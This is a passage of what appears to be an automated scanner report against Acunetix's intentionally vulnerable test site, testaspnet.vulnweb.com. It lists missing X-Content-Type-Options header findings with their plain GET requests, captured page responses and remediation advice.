          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        21. GET http://testaspnet.vulnweb.com/robots.txt
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (222 bytes)
          GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (245 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Mon, 06 May 2019 12:46:42 GMT
          Accept-Ranges: bytes
          ETag: "b0b05ac194d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13
          
          
          Response body (13 bytes)
          User-agent: *
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        22. GET http://testaspnet.vulnweb.com/rssFeed.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (220 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/xml; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2118
          
          
          Response body (2118 bytes)
          
          <rss version="2.0">
                <channel>
                  <title>Acunetix testaspnet</title>
                  <link>http://testaspnet.acunetix.com/</link>
                  <description>
                    This is the syndication feed for testaspnet.acunetix.com.
                  </description>
          
                  <item>
                    <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title>
                    <description>
                       Seamless OpenVAS integration now also available on Windows and Linux
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=0
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Thu, 16 May 2019 12:32:30 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Acunetix Web Vulnerability Scanner beta released!</title>
                    <description>
                       26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=3
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:37:35 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Web attacks - can your web applications withstand the force?</title>
                    <description>
                       21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=2
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:35:22 GMT
                     </pubDate>
                  </item>
            
                </channel>
              </rss>  
            
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        23. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        24. GET http://testaspnet.vulnweb.com/styles.css
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/css
          Last-Modified: Thu, 29 May 2008 14:36:50 GMT
          Accept-Ranges: bytes
          ETag: "c8c2136e99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2597
          
          
          Response body (2597 bytes)
          body
          {
          	padding-right: 0px;
          	padding-left: 0px;
          	list-style-position: outside;
